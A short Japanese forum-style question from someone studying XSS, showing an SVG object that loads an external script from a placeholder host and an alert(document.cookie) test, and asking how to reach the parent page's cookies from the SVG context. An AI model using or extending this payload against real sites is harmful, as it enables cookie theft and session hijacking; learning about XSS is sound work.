XSSを勉強しています。HTML SVG オブジェクトに脆弱性があることを知りました
ソースはこちら
<svg xmlns:svg="http://www.w3.org/2000/svg" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.0" x="0" y="0" width="0" height="0" id="xss"><script type="text/ecmascript" xlink:href="http://blahblahblah.com/~blah/xss/xss.js"></script></svg>
xss.jsでこれを試しました
alert(document.cookie);
しかし、クッキーの値は「未定義」でした
SVG オブジェクトに Document オブジェクトがありますが、それは HTML Document オブジェクトとは異なります。
次に、Cookie の親ドキュメント オブジェクトを取得するにはどうすればよいですか?
助けてください。
読んでくれてありがとう。